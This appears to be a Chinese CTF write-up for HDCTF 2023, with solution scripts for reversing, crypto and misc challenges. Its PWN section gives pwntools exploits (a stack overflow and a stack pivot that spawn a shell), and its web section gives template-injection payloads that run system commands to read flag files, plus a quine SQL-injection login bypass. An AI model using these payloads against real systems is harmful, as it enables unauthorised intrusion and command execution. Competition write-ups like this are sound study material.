WP
WP写的可能有些丑陋,佬们轻点喷orz
Reverse
Easy_re
观察主函数
看一下func函数,
一眼base64,找到密文
在线解密
Easyasm
关键代码
可以看出主要逻辑是先将明文异或0x10后再和密文进行比较
密文:
str=[0x58, 0x54, 0x53, 0x44, 0x56, 0x6B, 0x5A, 0x65, 0x63, 0x64,
0x4F, 0x71, 0x4F, 0x75, 0x23, 0x63, 0x69, 0x4F, 0x71, 0x43,
0x7D, 0x6D]
for i in range(len(str)):
str[i]^=0x10
print(bytes(str))
double_code
跟踪函数
在sub_1400142B0函数里找到以下函数,跟进查看
在此处找到关键函数sub_14001F000,可以在这里找到主要加密逻辑
可以知道密文是根据i%5的值进行不同的操作
根据密文逆推flag
result=[0x48,0x67,0x45,0x51,0x42,0x7b,0x70,0x6a,0x30,0x68,0x6c,0x60,0x32,0x61,0x61,0x5f,0x42,0x70,0x61,0x5b,0x30,0x53,0x65,0x6c,0x60,0x65,0x7c,0x63,0x69,0x2d,0x5f,0x46,0x35,0x70,0x75,0x7d]
for i in range(len(result)):
if i%5==1:
result[i]^=0x23
elif i%5==2:
result[i]-=2
elif i%5==3:
result[i]+=3
elif i%5==4:
result[i]+=4
print(bytes(result))
fake_game
010editor看一下game.exe,在末尾发现python字眼
发现是python写的,于是用python3.8版本,用pyinstxtractor.py反编译exe文件
由于本机是python3.9,于是换到虚拟机里跑,切记要用python3.8,不然uncompyle6反编译的代码会有些问题
在分离出的文件里找到game.pyc文件,用uncompyle6反编译pyc文件
在game.py中找到关键代码
用z3解出xorr数组
from z3 import *
xorr = [BitVec('u%d' % i, 64) for i in range(0, 4)]
solver = Solver()
solver.add(xorr[0] * 256 - xorr[1] / 2 + xorr[2] * 23 + xorr[3] / 2 == 47118166)
solver.add(xorr[0] * 252 - xorr[1] * 366 + xorr[2] * 23 + xorr[3] / 2 - 1987 == 46309775)
solver.add(xorr[0] * 6 - xorr[1] * 88 + xorr[2] / 2 + xorr[3] / 2 - 11444 == 1069997)
solver.add((xorr[0] - 652) * 2 - xorr[1] * 366 + xorr[2] * 233 + xorr[3] / 2 - 13333 == 13509025)
solver.check()
result = solver.model()
print(result)
解得[u1 = 248, u0 = 178940, u2 = 56890, u3 = 2360]
然后根据密文和xor_key逆推flag
发现xorr[3]有些问题,flag格式应为HDCTF{},根据格式求下xorr[3]
应该是2361
xorr=[178940,248,56890,2361]
flag = [178868, 188, 56953, 2413, 178874, 131, 56957, 2313, 178867, 156,
56933, 2377, 178832, 202, 56899, 2314, 178830, 167, 56924,
2313, 178830, 167, 56938, 2383, 178822, 217, 56859, 2372]
for i in range(len(flag)):
flag[i] = flag[i] ^ xorr[i % 4]
print(bytes(flag))
买了些什么呢
(可能是非预期,预期应该是背包问题求解)
关键判断
在此处下断点动调出check的值
check值为0x74,即116
将重量和价值的值复制出来
找到价值大于重量的值
wt=[2, 5, 10, 9, 3, 6, 2, 2, 6, 8, 2, 3, 3, 2, 9, 8, 2, 10, 8, 6, 4, 3, 4, 2, 4, 8, 3, 8, 4, 10, 7, 1, 9, 1, 5, 7, 1, 1, 7, 4]
val=[8, 1, 5, 9, 5, 6, 8, 2, 3, 7, 5, 4, 3, 7, 6, 7, 9, 3, 10, 5, 2, 4, 5, 2, 9, 5, 8, 10, 2, 9, 6, 3, 7, 3, 9, 6, 10, 1, 2, 9]
result=116
sum=0
list=[]
for x in range(1,11):
for i in range(len(val)):
if wt[i]==x:
if val[i]-wt[i]>0:
print(i,wt[i],val[i])
sum+=val[i]
list.append(i)
print(sum)
可以发现为126,排序得到
0 4 6 10 11 13 16 18 21 22 24 26 27 31 33 34 36 39
于是去除掉其中一个价值为10的,有两种情况,分别尝试
最终flag为NSSCTF{0 4 6 10 11 13 16 18 21 22 24 26 31 33 34 36 39}
Enc
关键代码
进入sub_411523->sub_415100函数查看
tea加密
#include<stdio.h>
#include<stdlib.h>
void encode(unsigned int *a1)
{
unsigned int v2;
unsigned int v3;
int x,v4;
unsigned int i;
for(x=0;x<1;x++)
{
v2 = *(a1+x*2);
v3 = *(a1+x*2+1);
v4 = 0;
for(i=0;i<0x20;++i)
{
v4 -= 0x61C88647;
v2 += ((v3 >> 5) + 52) ^ (v3 + v4) ^ (16 * v3 + 18);
v3 += ((v2 >> 5) + 120) ^ (v2 + v4) ^ (16 * v2 + 86);
}
*(a1+x*2) = v2;
*(a1+x*2+1) = v3;
// printf("\n%X\n",v4);
}
}
void decode(unsigned int *a1)
{
unsigned int v2;
unsigned int v3;
int x,v4;
unsigned int i;
for(x=0;x<1;x++)
{
v2 = *(a1+x*2);
v3 = *(a1+x*2+1);
v4 = 0xC6EF3720;
for(i=0;i<0x20;++i)
{
v3 -= ((v2 >> 5) + 120) ^ (v2 + v4) ^ (16 * v2 + 86);
v2 -= ((v3 >> 5) + 52) ^ (v3 + v4) ^ (16 * v3 + 18);
v4 += 0x61C88647;
}
*(a1+x*2) = v2;
*(a1+x*2+1) = v3;
}
}
int main()
{
unsigned int v[2]={0x60FCDEF7,0x236DBEC};
decode(v);
int i;
for(i=0;i<2;i++)
{
printf("%c",v[i]&0xff);
printf("%c",(v[i]&0xff00)%0xff);
printf("%c",(v[i]&0xff0000)%0xffff);
printf("%c",(v[i]&0xff000000)%0xffffff);//key=3
}
printf("\n");
for(i=0;i<2;i++)
{
printf("0x%.8X ",v[i]);
}
printf("\n");
encode(v);
for(i=0;i<2;i++)
{
printf("0x%.8X ",v[i]);
}
system("pause");
return 0;
}
解得key为3
查看sub_4113DE->sub_414C10->sub_411046->sub_414B00函数
查看sub_411221->sub_415340函数
发现是smc,于是动调到这之后,还原代码
在此处下断点
跟进sub_411302函数
有点像rc4,但是感觉有点变种,已知flag长度为35
输入35个1,并运行到此处
取出xor后的结果v16数组
v17数组
将’11111111111111111111111111111111111’与v16数组异或,得到xor_key
再与v17数组异或
input='11111111111111111111111111111111111'
result=[0x76, 0xE1, 0xDC, 0x97, 0xB7, 0x1D, 0x8A, 0xE1, 0xDE, 0x2B,
0x67, 0x13, 0xF7, 0xCE, 0x1D, 0x99, 0x29, 0x78, 0x6D, 0x2B,
0xAE, 0x91, 0x71, 0x1A, 0x5C, 0x39, 0xDE, 0x27, 0x10, 0x63,
0x7F, 0x2D, 0xF4, 0x92, 0x68]
flag=[0x0F, 0x94, 0xAE, 0xF2, 0xC0, 0x57, 0xC2, 0xE0, 0x9A, 0x45,
0x37, 0x50, 0xF5, 0xA0, 0x5E, 0xCB, 0x2C, 0x16, 0x28, 0x29,
0xFE, 0xFF, 0x33, 0x46, 0x0E, 0x57, 0x82, 0x22, 0x52, 0x26,
0x2B, 0x6E, 0xE4, 0x82, 0x24]
xor_key=[]
for i in range(len(result)):
xor_key.append(ord(input[i])^result[i])
for i in range(len(flag)):
flag[i]=flag[i]^xor_key[i]
print(bytes(flag))
Basketball
关键代码
将strcmp比较的值提取出来,爆破一下刚开始输入的数据
str=[85, 105, 104, 120, 33, 104, 114, 33, 96, 33, 105, 98, 101, 117, 33, 124, 105, 106, 117, 33, 72, 33, 105, 100, 109, 113, 43, 120, 110, 116, 33, 104, 114, 43, 115, 100, 108, 104, 111, 101, 33, 120, 110, 116, 33, 117, 110, 33, 98, 73, 100, 98, 106, 33, 117, 105, 100, 33, 96, 115, 115, 96, 120, 33, 96, 111, 101, 33, 117, 105, 115, 100, 100, 33, 111, 116, 102, 99, 100, 115, 114, 33, 98, 96, 111, 33, 119, 98, 100, 118, 33, 96, 114, 33, 96, 33, 102, 115, 110, 116, 113]
def f(k1_0,k2_0):
for i in range(len(str)):
k1_0 = (str[i] + k1_0) % 300
k2_0 = (str[i] + k2_0) % 300
str[i] ^= text_66(k1_0, k2_0)
def text_66(a,b):
aa=a
ba=b
if a<b:
aa,ba=ba,aa
if ba:
result = text_66(ba, aa % ba)
else:
result = aa
return result
for x in range(100):
for y in range(100):
str=[85, 105, 104, 120, 33, 104, 114, 33, 96, 33, 105, 98, 101, 117, 33, 124, 105, 106, 117, 33, 72, 33, 105, 100, 109, 113, 43, 120, 110, 116, 33, 104, 114, 43, 115, 100, 108, 104, 111, 101, 33, 120, 110, 116, 33, 117, 110, 33, 98, 73, 100, 98, 106, 33, 117, 105, 100, 33, 96, 115, 115, 96, 120, 33, 96, 111, 101, 33, 117, 105, 115, 100, 100, 33, 111, 116, 102, 99, 100, 115, 114, 33, 98, 96, 111, 33, 119, 98, 100, 118, 33, 96, 114, 33, 96, 33, 102, 115, 110, 116, 113]
f(x,y)
flag=1
for i in str:
if i>=127 or i<32:
flag=0
break
if flag==1:
print(bytes(str))
大致还原下为
I help you is remind you to check the array and three numbers can view as a group
提醒三个数字为一组,再根据题目放出的提示
猜测是rgb转图片,在CSDN上找了个转换脚本
https://blog.csdn.net/ssjjtt1997/article/details/78450816
from PIL import Image
with open('array.txt', 'r') as f:
data = f.readlines() #txt中所有字符串读入data
for line in data:
list = line.split(' ') #将单个数据分隔开存好
f.close()
x = 561 #x坐标 通过对txt里的行数进行整数分解
y = 637 #y坐标 x * y = 行数
im = Image.new("RGB", (x, y)) #创建图片
index=0
for i in range(0, x):# 通过每个rgb点生成图片
for j in range(0, y):
im.putpixel((i, j), (int(list[index]), int(list[index+1]), int(list[index+2]))) #将rgb转化为像素
index+=3
im.show()
运行得到
猜测message为I want to play basketball
将输入的字符和message进行异或运算
提取出code
flag=[1, 100, 52, 53, 40, 15, 4, 69, 46, 109, 47, 40, 55, 55, 92, 94, 62, 70, 23, 72, 8, 82, 29, 65, 16, 117, 117, 10]
xor_key='I want to play basketball'
for i in range(len(flag)):
flag[i]^=ord(xor_key[i%len(xor_key)])
print(bytes(flag))
PWN
Pwnner
关键代码
rand值可动调得到为1956681178
read函数有栈溢出漏洞
Shift+F12查看下字符串,有后门
from pwn import *
p = remote('node6.anna.nssctf.cn', 28400, level='debug')
p.sendline(b'1956681178')
payload = b'a' * (0x40 + 8) + p64(0x4008B2)
p.sendline(payload)
p.interactive()
KEEP ON
关键代码
有printf泄露
可以发现0x400768为返回地址
所以它的前一个数为ebp地址
leave和rdi地址
read读取的长度不够,需要栈迁移
from pwn import *
p = remote('node5.anna.nssctf.cn', 28003, level='debug')
p.sendafter(b'please show me your name: \n', b'%16$p-')
p.recvuntil(b'0x')
ebp_addr = int(p.recvuntil(b'-')[:-1], 16) - 0x60 + 8
print(hex(ebp_addr))
leave_addr = 0x4007F2
rdi_addr = 0x4008D3
ret_addr = 0x4008D4
payload = b'/bin/sh;' + p64(ret_addr) + p64(rdi_addr) + p64(ebp_addr-8) + p64(0x40085D) + b'a' * (0x50 - 40) + p64(ebp_addr) + p64(leave_addr)
p.sendafter(b'keep on !\n', payload)
p.interactive()
CRYPTO
Normal_Rsa
出题人忘删flag了,打开代码即有flag
Normal_Rsa(revenge)
from Crypto.Util.number import *
import gmpy2
P = 8760210374362848654680470219309962250697808334943036049450523139299289451311563307524647192830909610600414977679146980314602124963105772780782771611415961
Q = 112922164039059900199889201785103245191294292153751065719557417134111270255457254419542226991791126571932603494783040069250074265447784962930254787907978286600866688977261723388531394128477338117384319760669476853506179783674957791710109694089037373611516089267817074863685247440204926676748540110584172821401
n = 12260605124589736699896772236316146708681543140877060257859757789407603137409427771651536724218984023652680193208019939451539427781667333168267801603484921516526297136507792965087544395912271944257535087877112172195116066600141520444466165090654943192437314974202605817650874838887065260835145310202223862370942385079960284761150198033810408432423049423155161537072427702512211122538749
c = 7072137651389218220368861685871400051412849006784353415843217734634414633151439071501997728907026771187082554241548140511778339825678295970901188560688120351732774013575439738988314665372544333857252548895896968938603508567509519521067106462947341820462381584577074292318137318996958312889307024181925808817792124688476198837079551204388055776209441429996815747449815546163371300963785
e = 65537
for i in range(100):
x=gmpy2.iroot(P+i*n,2)
if x[1]==True:
p=x[0]
for i in range(100):
x=gmpy2.iroot(Q+i*n,2)
if x[1]==True:
q=x[0]
r=n//(p*q)
phi=(p-1)*(q-1)*(r-1)
d=inverse(e,phi)
print(d)
m=pow(c,d,n)
print(m)
print(long_to_bytes(m))
爬过小山去看云
(赛后出)
题目描述
密文:ymyvzjtxswwktetpyvpfmvcdgywktetpyvpfuedfnzdjsiujvpwktetpyvnzdjpfkjssvacdgywktetpyvnzdjqtincduedfpfkjssne
在山的那头,有3个人,4只鸟,19只羊,11朵云
山,对应hill,想到希尔加密
your pin is eight four two zero eight four two one zero eight eight four zero two four zero eight four zero one zero one two four x
对应842084210884024084010124
到这里本来没有思路的,还是见识少了,又是跟着大佬们学习知识的一天
学到了云影密码,网上找个脚本跑一下
a = "842084210884024084010124"
a = a.split("0")
flag = ''
for i in range(0, len(a)):
str = a[i]
sum = 0
for i in str:
sum += int(i)
flag += chr(sum + 64)
print(flag)
MISC
hardMisc
010查看图片,在最后有base64加密
在线网站跑一下
ExtremeMisc
foremost分离图片
压缩包套娃,有个加密压缩包Dic.zip,ARCHPR爆破一下
密码是haida,将文件提取出来后,用010打开
还是个压缩包,将数据提取出来,调整一下
str='''05 B4 30 40 51 00 10 00 90 00 1F EB C8 65 9F 42
96 08 A1 10 00 00 E7 10 00 00 90 00 00 00 05 C6
16 96 E6 E2 A7 96 07 B1 65 01 1C E7 66 D9 0A 49
22 2C 95 B2 88 48 74 AB 50 7D 65 97 60 72 DC D0
47 6D 2C 27 82 E8 ED 3B 25 8B 62 D3 B8 D0 CC E0
32 A3 F8 61 39 CE 16 FA 1B F0 C1 E4 EB 8B E8 A2
7A 9C 32 D9 AB C3 40 84 FB 87 64 F3 42 FE 1E 58
CB 15 69 5D DB 0A AB 69 C2 8E FE 1B 08 EC 65 12
33 4C 48 9E 5E 66 4F E1 B5 72 61 B7 AB 56 2C C0
C9 0B 99 C8 2E D9 8B 53 85 FA D9 68 93 C7 9B 41
BA 8B 9A D1 53 13 0D 60 67 8B B2 FF F4 AC E8 1B
50 B8 61 D8 E5 2B C4 46 BA F9 AE 94 D5 27 EF CC
66 93 7E B5 91 9D 8F 79 B1 C0 22 0C 0C F2 E8 C9
95 06 DD 99 99 59 FA B6 2B 47 22 B0 C7 E7 D4 51
72 FA 35 27 11 C7 EA 3B 33 67 2A 04 EB 3B 5B A8
4D 2F 44 67 4F B7 01 28 34 CA E9 8E E0 F4 27 EA
89 D4 20 75 DD C7 72 18 A5 4B 87 BB 07 53 F4 B1
A6 98 08 6E FC DF C8 5C 44 E8 14 5A E6 F3 74 5E
4B ED 20 52 03 99 55 7B D8 A9 92 A8 A6 1B 00 0D
33 86 A8 A7 CC AB A0 07 B3 E6 DE 17 9B B0 D6 E2
18 05 B4 30 40 51 00 10 00 90 00 DF EB C8 65 BF
FB 81 42 59 00 00 00 EB 00 00 00 A0 00 00 00 37
56 36 27 56 47 E2 A7 96 07 66 F4 9B D3 17 41 20
90 75 C9 10 4C 48 AA F9 88 27 A3 C8 F6 78 78 C0
1C BF C0 CA 49 7B BC 92 B2 5D A3 F0 D6 5A 29 FD
69 66 4B 15 46 B7 9F 61 64 FB 54 0F EB 8F A6 22
E9 0F C3 23 ED E6 19 BE 5E 7A 44 43 07 10 86 D7
33 B1 E7 19 BA E3 52 5F 1A F1 C4 38 43 5A F0 0C
7B 41 01 D8 40 96 E0 4D 33 CD 2F F9 F7 00 94 7E
84 A8 03 01 93 13 CB A4 A3 6D 14 60 5B F6 A1 F3
A4 DB 32 AE 3D 62 31 A6 17 C9 86 45 52 7C DB A8
4D 96 5F 10 00 B4 C7 DB 61 72 23 BA A5 A1 05 B4
10 20 F3 00 51 00 10 00 90 00 1F EB C8 65 9F 42
96 08 A1 10 00 00 E7 10 00 00 90 00 42 00 00 00
00 00 00 00 02 00 00 00 00 00 00 00 05 C6 16 96
E6 E2 A7 96 07 A0 00 02 00 00 00 00 00 10 00 81
00 00 FD 53 73 75 D6 9D 10 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 05 B4 10 20 F3 00 51
00 10 00 90 00 DF EB C8 65 BF FB 81 42 59 00 00
00 EB 00 00 00 A0 00 42 00 00 00 00 00 00 00 02
00 00 00 14 10 00 00 37 56 36 27 56 47 E2 A7 96
07 A0 00 02 00 00 00 00 00 10 00 81 00 00 BF 38
54 75 D6 9D 10 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 05 B4 50 60 00 00 00 00 20 00 20
00 7B 00 00 00 EF 10 00 00 00 00'''
str=str.replace('\n','')
str=str.replace(' ','')
zip=''
for i in range(0,len(str),2):
zip+=str[i+1]+str[i]
print(zip)
得到一个压缩包
再用ARCHPR爆破一下,得到密码9724
又解压出两个压缩包,然后明文攻击爆破一下
得到密码为w98d@ud
解压得到flag
MasterMisc
cmd还原下压缩包
copy /B topic.zip.001 + topic.zip.002 + topic.zip.003 + topic.zip.004 + topic.zip.005 + topic.zip.006 topic.zip
加密压缩包,ARCHPR爆破一下,密码5483
图片用foremost分离一下
得到一张新的图片和音频,wav放进audacity看一下
在频谱图发现第一串flag
由于图片在kali里不能正常显示,猜测改了宽高
用tweakpng改一下宽高,发现第二串flag
wav文件开头是RIFF
于是在最初的图片里搜索一下,找到第三串flag
WEB
Welcome To HDCTF 2023
每个js都看一下,在game.js发现关键代码
发现gameOver后执行弹窗代码
发现flag
SearchMaster
题目要求可以post传一个数据
直接post data={{7*7}}
证明有ssti
fuzz之后发现
data={if system(‘ls’)}{/if}可以执行命令
直接搜索flag
data={if system(“find / |grep ‘flag’”)}{/if}
直接读取flag
data={if system(“cat /usr/share/dpkg/buildflags.mk /flag_13_searchmaster”)}{/if}
LoginMaster
目录扫描发现
发现一部分代码
应该还有隐藏的代码判断用户名是否等于admin
核心思想就是让sql语句执行的结果等于sql语句本身,来绕过这个验证
$row[‘password’] === $password
Poc最终为
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
登陆后得到flag
957
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
